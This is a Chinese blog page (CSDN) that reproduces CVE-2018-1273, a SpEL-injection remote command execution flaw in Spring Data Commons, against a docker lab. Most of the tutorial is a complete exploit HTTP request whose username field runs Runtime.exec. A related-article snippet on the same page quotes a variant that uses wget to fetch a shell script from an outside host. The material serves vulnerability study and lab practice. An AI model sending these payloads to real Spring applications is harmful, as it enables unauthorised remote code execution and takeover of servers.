Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)——漏洞复现

最新推荐文章于 2024-03-12 10:31:05 发布
最新推荐文章于 2024-03-12 10:31:05 发布
阅读量150 收藏
点赞数
文章标签: spring java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42090431/article/details/134672548
版权
1、启动环境

docker-compose up -d

稍等一会,环境启动后,访问`http://your-ip:8080/users`,将可以看到一个用户注册页面。

2、漏洞复现

参考前面链接中的Payload,在注册的时候抓包,并修改成如下数据包:

```
POST /users?page=&size=5 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 124
Pragma: no-cache
Cache-Control: no-cache
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:8080/users?page=0&size=5
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=
```

执行`docker-compose exec spring bash`进入容器中,可见成功创建`/tmp/success`,说明命令执行成功:

Sarahie
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
poc-cve-2018-1273:CVE-2018-1273的POC
05-15
CVE-2018-1273 Spring Data Commons(1.13至1.13.10之前的版本,2.0至2.0.5的版本以及较早的不受支持的版本)包含由于特殊元素的不正确中和导致的属性绑定器漏洞。 未经身份验证的远程恶意用户(或攻击者)可以针对...
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
001--什么是SpringData
weixin_42288943的博客
04-17 164
1.参考网址:https://blog.csdn.net/zgf19930504/article/details/50537198 2.核心内容: ** Spring Data **是Spring 的一个子项目, 旨在统一和简化对各类型持久化存储, 而不拘泥于是关系型数据库还是NoSQL 数据存储。无论是哪种持久化存储, 数据访问对象(或称作为DAO,...
【组件攻击链】Spring全家桶各类RCE漏洞浅析
further_eye的博客
12-07 3265
尽管近期没有出现相关漏洞,但这些高风险漏洞依然不可忽视。本文涉及漏洞大多不需要复杂的配置就可以直接攻击成功,执行任意代码,危害较大。故开发者在使用Spring进行开发的过程中,一定要关注其历史风险点,规避高危漏洞,减少修改不必要的配置信息。
spring(CVE-2018-1273)远程代码执行漏洞复现
最新发布
勤劳的码农的博客
03-12 9259
Spring DataSpring框架中提供底层数据访问的项目模块,Spring Data Commons 是一个共用的基础模块。此模块对特殊属性处理时会使用SpEl表达式,导致攻击者可以通过构造特殊的URL请求,造成服务端远程代码执行。在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令Spring在补丁中使用更加安全的SimpleEvaluationContext替换了StandardEvaluationContext。
CVE-2018-1273漏洞复现
永远是少年
12-26 1268
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2018-1273漏洞复现。 一、CVE-2018-1273漏洞简介 二、CVE-2018-1273漏洞复现
Spring框架漏洞复现大杂烩!!!
热门推荐
SoulCat
02-27 2万+
Spring框架漏洞复现大杂烩!!! 寻了半生的春天 你一笑 便是了 总体概述: Spring是一个开源框架,核心是控制反转(IoC)和面向切面(AOP)。简单来说,Spring是一个分层的JavaSE/EE full-stack(一站式) 轻量级开源框架。简单说就是创建对象由以前的程序员自己new 构造方法来调用,变成交由Spring来创建对象 。类比Struts 2框架绝大部分的安全漏洞...
[Vulhub] Spring漏洞复现
weixin_45605352的博客
10-09 3161
Spring Security OAuth2 RCE(CVE-2016-4977) 0x00 漏洞描述 Spring Security OAuth 支持使用标准 SpringSpring Security 编程模型和配置习惯用法与 OAuth (1a) 和 OAuth2 一起使用 Spring Security。 在使用白标签视图进行错误处理时,远程攻击者可以通过 Springs 表达式语言 (SpEL) 构造恶意参数来执行命令。 0x01 影响版本 2.0.0 - 2.0.9 1.0.0 - 1.
Spring Data Commons远程命令执行漏洞复现CVE-2018-1273
wutiangui的博客
09-10 665
下载文件请求包:username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/usr/bin/wget -O /tmp/1.sh http://192.168.155.2:8081/shell.sh”)]&password=test&repeatedPassword=test。访问http://192.168.25.128:8080/users,注册,BP抓包。在sh文件所在目录开启http服务。2.开启http服务。
Spring Data Commons-远程命令执行漏洞CVE-2018-1273
qq_43381463的博客
04-19 360
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令
Spring Data Commons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)
weixin_42786460的博客
09-16 217
Spring Data Commons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)
[Java安全]Spring Data CommonsCVE-2018-1273
snowlyzz的博客
02-08 627
CVE-2018-1273漏洞分析
spring-data-commons-2.0.6.RELEASE-API文档-中文版.zip
07-14
赠送jar包:spring-data-commons-2.0.6.RELEASE.jar; 赠送原API文档:spring-data-commons-2.0.6.RELEASE-javadoc.jar; 赠送源代码:spring-data-commons-2.0.6.RELEASE-sources.jar; 赠送Maven依赖信息文件:...
spring-data-commons-2.5.5-API文档-中文版.zip
06-04
赠送jar包:spring-data-commons-2.5.5.jar; 赠送原API文档:spring-data-commons-2.5.5-javadoc.jar; 赠送源代码:spring-data-commons-2.5.5-sources.jar; 赠送Maven依赖信息文件:spring-data-commons-2.5.5....
spring-data-commons-2.3.9.RELEASE-API文档-中文版.zip
07-13
赠送jar包:spring-data-commons-2.3.9.RELEASE.jar; 赠送原API文档:spring-data-commons-2.3.9.RELEASE-javadoc.jar; 赠送源代码:spring-data-commons-2.3.9.RELEASE-sources.jar; 赠送Maven依赖信息文件:...
Spring Data Commons 远程命令执行漏洞CVE-2018-1273
黑白的博客
12-20 2506
声明 好好学习,天天向上 漏洞描述 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。 影响范围 · Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10) · Spring Data REST 2.6 - 2
Spring Data Commons
weixin_45594127的博客
11-27 2312
Spring data repository
【网络安全】Spring框架漏洞总结(二)
kali_Ma的博客
09-11 989
安全防护 1.使用1.0.x版本的用户应放弃在认证通过和错误这两个页面中使用Whitelabel这个视图。 2.使用2.0.x版本的用户升级到2.0.10以及更高的版本 因为对java不是很熟,所以没有对底层原理进行分析 2.Spring Web Flow框架远程代码执行(CVE-2017-4971) 漏洞简介 Spring Web Flow是Spring的一个子项目,主要目的是解决跨越多个请求的、用户与服务器之间的、有状态交互问题,提供了描述业务流程的抽象能力。 Spring WebFlow 是一个适用于
描述**CVE**-2019-0232 Apache Tomcat远程代码执行漏洞
05-28
CVE-2019-0232是Apache Tomcat中的一个严重漏洞,可以允许攻击者通过特制的请求发送远程代码执行命令,从而控制Tomcat服务器。该漏洞由于存在于Tomcat中使用的Apache Commons FileUpload库中的一个漏洞,因此也被称为“Apache Commons FileUpload远程代码执行漏洞”。 攻击者可以构造一个特制的HTTP请求,该请求中包含恶意的JSP文件,并将该JSP文件传到Tomcat服务器上的一个目录中。一旦成功上传,攻击者可以通过直接访问该JSP文件来执行任意命令,包括获取服务器上的敏感数据或在服务器上执行其他恶意操作。 这个漏洞影响到Apache Tomcat 9.0.0.M1到9.0.17、8.5.0到8.5.39和7.0.0到7.0.93版本。Apache Tomcat官方已经发布了修复这个漏洞的补丁程序,建议用户尽快升级到最新版本。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值